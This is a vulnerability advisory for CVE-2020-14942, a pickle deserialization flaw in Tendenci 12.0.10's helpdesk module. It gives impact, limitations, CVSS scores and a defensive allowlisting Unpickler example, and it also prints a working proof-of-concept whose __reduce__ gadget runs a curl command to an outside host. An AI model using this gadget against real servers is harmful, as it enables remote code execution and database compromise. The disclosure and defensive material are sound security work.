Attacker Value: Low (1 user assessed)
Exploitability: High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2020-14942

Disclosure Date: June 21, 2020

Description

Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.


2 Ratings
Technical Analysis

Outline

Untrusted data from the client side is used to create a Python pickled object. This can lead to full RCE and compromise of the host. There are some limitations, and this is not the default configuration.

Impact

If you can control the input, it may be possible to gain code execution on the underlying server. With code execution, you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.
  • A valid authenticated account with permissions to access /tickets is required.

Patch

This doesn’t appear to be patched in the latest release, although it has been acknowledged.

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
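
From the defensive side, here is an added example (not part of this assessment or of Tendenci's code) showing how an allowlisting Unpickler rejects a __reduce__ gadget of the kind used in the POC above while still loading plain data; not unpickling client-supplied data at all remains the preferable fix. The SAFE_BUILTINS set and the _Gadget class are constructed assumptions for the demo, and _Gadget deliberately points at a harmless callable.

```python
import io
import os
import pickle

# Types the helpdesk view is assumed (for this example) to legitimately
# expect inside a pickled blob: plain data only, never callables.
SAFE_BUILTINS = {"dict", "list", "tuple", "set", "frozenset", "str",
                 "bytes", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside an allowlist.

    pickle resolves callables such as os.system through find_class(),
    so denying anything outside SAFE_BUILTINS stops a __reduce__ gadget
    like the one in the POC above before any code runs.
    """

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"forbidden global {module}.{name} in untrusted pickle")


def restricted_loads(data: bytes):
    """Deserialize untrusted bytes, allowing only plain data types."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class _Gadget:
    """Constructed stand-in for the POC's RCE class. It points at a
    harmless callable (os.getcwd) so the demo never runs a shell command."""

    def __reduce__(self):
        return os.getcwd, ()


def demo():
    """Return (benign_result, gadget_rejected) for two constructed payloads."""
    benign = pickle.dumps({"ticket": 42, "tags": ["urgent", "billing"]})
    hostile = pickle.dumps(_Gadget())
    benign_result = restricted_loads(benign)
    try:
        restricted_loads(hostile)
        rejected = False
    except pickle.UnpicklingError:
        rejected = True
    return benign_result, rejected


if __name__ == "__main__":
    print(demo())
```
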

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • tendenci

Products

  • tendenci 12.0.10
